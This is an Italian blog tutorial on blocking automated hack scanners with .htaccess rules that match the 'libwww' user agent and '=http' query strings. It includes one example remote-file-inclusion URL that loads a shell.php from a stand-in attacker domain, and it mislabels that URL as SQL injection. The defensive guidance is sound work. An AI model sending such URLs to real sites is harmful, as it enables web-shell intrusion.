Come proteggere il tuo sito da scanner hack

0

Scanner hacker: Come proteggersi

Come detto nel mio articolo, la pirateria non si limita al solo nome “Hacker”,
ma ben sì ci sono moltissimi “ranghi” molto pericolosi,
tra questi sono i Lamer e Script Kieddie.

Molti di essi affidano la loro “penetration-test” a scanner automatici,
essi hanno la funzione di fare una scansione casuale su moltissimi siti,
con l’obbiettivo di trovare e testare vulnerabilità di siti casuali e segnalarli all’attaccante.

Grazie al mio tutorial ti spiegherò come è possibile prevenire alcuni attacchi provenienti da scanner.

Funzione degli Scanner e un po di teoria

Molti scanner utilizzano l’user-agent “libwww-perl.” ,
probabilmente se hai un sito online da diversi mesi, se controllerai i tuoi log troverai numerosi tentativi provenienti da esso.
Questo user-agent accede alle tue pagine (via url) tentando di iniettare un codice oppure caricare un file.
Come potrai dedurre è molto pericoloso, poiché questi scanner molto spesso hanno la funzione di testare un SQLi (SQL injection), RFI (Remote File Inclusion), LFI (Local File Inclusion) ecc ecc.

Sql Injection Scanner

Questi tipi di strumenti spesso utilizzano il comando “=http:” “=www:”
Per esempio, www.tuosito.it/cartella/pagina.php?id21=http://www.attaccante.com/shell.php

Come proteggere il mio sito?

Per risolvere questo problema basterà semplicemente aggiungere questo codice nel tuo .htaccess
e farà in modo di bloccare le provenienze dell’user-agents libwww-perl:

RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)=http [NC]

RewriteRule ^(.*)$ – [F,L]

Grazie a questo piccolo trick il tuo sito inizierà ad essere più sicuro.